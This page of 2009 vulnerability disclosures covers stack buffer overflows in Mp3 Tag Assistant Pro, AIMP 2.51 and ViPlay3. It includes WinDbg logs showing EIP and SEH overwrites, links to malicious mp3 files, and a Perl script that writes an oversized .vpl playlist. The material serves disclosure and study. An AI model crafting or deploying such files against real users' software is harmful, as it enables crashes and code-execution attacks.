31 May, 2009

Mp3 Tag Assistant Pro 2.92 (tag metadata) Remote Stack Overflow PoC

################################################################################

### Title: Mp3 Tag Assistant Pro 2.92 (tag metadata) Remote Stack Overflow PoC

### Summary: MP3 Tag Assistant Professional 2.92 is a professional-level audio
tag editor with UNICODE support.

### Product web page: http://www.assistanttools.com/

### Desc: MP3 Tag Assistant Professional 2.92 is vulnerable to a stack buffer
overflow attack when loading a malicious mp3 file (or file that supports
tags) filled with overly long A's in its metadata (id3v1, id3v2 apev2,
etc.). To succesfully exploit this issue you have to change the hex
values of the file and remove the null bytes in the metadata header.
I'm being lazy this season..... so.... ;). You can take any mp3 file,
edit its metadata with some mp3 tag editor (ironic, isen't it..) and
fill every field with long string of bytes.

* I think that this issue is affecting many softwares out there that
deals with playing mp3 files or any other file that supports tags
metadata. So knock your socks off.....t00t w00t.

This is the same PoC as: http://zeroscience.org/codes/aimp2_poc.txt

So I'll use the same mp3 file (aimp2_evil.mp3) which is a song by
Gary Jules - Mad World, and it's approximately 2.92 megabytes.

Proof of Concept: http://www.zeroscience.org/codes/aimp2_evil.mp3

### Tested on Microsoft Windows XP Professional SP3 (English)

### WinDbg log:


---------------------------------------------------------------------------------

(c5c.eb0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=001093d4 ebx=00000000 ecx=00bc7f7c edx=00bc7f7c esi=0010a658 edi=00109414
eip=00410056 esp=00109418 ebp=00410041 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010282
*** WARNING: Unable to verify checksum for [path]\Mp3 Tag Assistant Pro.exe
*** ERROR: Module load completed but symbols could not be loaded for [path]\Mp3 Tag Assistant Pro.exe
Mp3_Tag_Assistant_Pro+0x10056:
00410056 008b45085068 add byte ptr [ebx+68500845h],cl ds:0023:68500845=??
0:000> g
(c5c.eb0): Access violation - code c0000005 (!!! second chance !!!)
eax=001093d4 ebx=00000000 ecx=00bc7f7c edx=00bc7f7c esi=0010a658 edi=00109414
eip=00410056 esp=00109418 ebp=00410041 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000282
Mp3_Tag_Assistant_Pro+0x10056:
00410056 008b45085068 add byte ptr [ebx+68500845h],cl ds:0023:68500845=??

---------------------------------------------------------------------------------


### OllyDbg log: http://img241.imageshack.us/img241/6766/mp3tagolly.jpg


### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

### liquidworm gmail com

### http://www.zeroscience.org/

### 31.05.2009

################################################################################


http://zeroscience.org/codes/mp3tag_bof.txt


29 May, 2009

AIMP 2.51 build 330 (ID3v1/ID3v2 Tag) Remote Stack Buffer Overflow PoC (SEH)


_______________________________________________________
| |
/ | * AIMP 2.51 build 330 (ID3v1/ID3v2 Tag) * |
/---, | * Remote Stack Buffer Overflow PoC (SEH) * |
-----# ==| | |
| :) # ==| |......................................................|
-----'----# | |______________________________________________________|
|)___() '# |______====____ \___________________________________|
[_/,-,\"--"------ //,-, ,-,\\\ |/ //,-, ,-, ,-,\\ __#
( 0 )|===******||( 0 )( 0 )||- o '( 0 )( 0 )( 0 )||
----'-'--------------'-'--'-'-----------------------'-'--'-'--'-'---------------
################################################################################


*** Summary: Freeware audio player

*** Product web page: http://www.aimp.ru/

*** Desc: AIMP version 2.51 build 330 suffers from a stack based buffer overflow
vulnerability that can be exploited via malicious media file that
supports ID3 tags (mp3). EIP and ECX registers gets overwritten,
including the SE handler and the pointer to the next SEH record. The
issue is trigered by viewing the file's metadata or by pressing the
F4 key and selecting the ID3v1 or ID3v2 tab.

*** Tested on Microsoft Windows XP Professional SP3 (English)

*** Windbg log:

--------------------------------------------------------------------------------

(f3c.850): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012d770 ebp=0012d790 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x14141:
41414141 0000 add byte ptr [eax],al ds:0023:00000000=??

--------------------------------------------------------------------------------


*** Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

*** liquidworm gmail com

*** http://www.zeroscience.org/

*** 29.05.2009


################################################################################

>>> *** PoC: http://milw0rm.com/sploits/2009-aimp2_poc.mp3.rar.w00t ~1.32 MB <<< ################################################################################ 'SHPA !!! ########### . . .n . . n. . .dP dP 9b 9b. . 4 qXb . dX Xb . dXp t dX. 9Xb .dXb __ __ dXb. dXP .Xb 9XXb._ _.dXXXXb dXXXXbo. .odXXXXb dXXXXb._ _.dXXP 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo. .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP `9XXXXXXXXXXXXXXXXXXXXX'~ ~`OOO8b d8OOO'~ ~`XXXXXXXXXXXXXXXXXXXXXP' `9XXXXXXXXXXXP' `9XX' Yo! `98v8P' Thricer `XXP' `9XXXXXXXXXXXP' ~~~~~~~ 9X. .db|db. .XP ~~~~~~~ )b. .dbo.dP'`v'`9b.odb. .dX( ,dXXXXXXXXXXXb dXXXXXXXXXXXb. dXXXXXXXXXXXP' . `9XXXXXXXXXXXb dXXXXXXXXXXXXb d|b dXXXXXXXXXXXXb 9XXb' `XXXXXb.dX|Xb.dXXXXX' `dXXP `' 9XXXXXX( )XXXXXXP `' XXXX X.`v'.X XXXX XP^X'`b d'`X^XX X. 9 ` ' P )X `b ` ' d' ` '




http://zeroscience.org/codes/aimp2_poc.txt

PoC: http://www.zeroscience.org/codes/aimp2_evil.mp3

07 May, 2009

ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC

--------------------------------------------------
#/usr/bin/perl
#
# ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC
#
# Product web page: http://www.urusoft.net/
# Tested on Microsoft Windows XP Professional SP3 (English)
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# http://www.zeroscience.org/
# 08.05.2009

$b= "[General]\r\n".
"Title=Proof of Concept\r\n".
"Author=LiquidWorm\r\n".
"Comments=2009\r\n".
"Version=1.0\r\n".
"[Files]\r\n";
"Count=800000\r\n".
"LastPlayed=0\r\n";
$c= "1=" . "A" x 800000 . "\r\n";
open a, ">./lqwrm.vpl";
print a $b.$c;
close a;
print "\n- Done!\n";
--------------------------------------------------





http://zeroscience.org/codes/viplay_poc.txt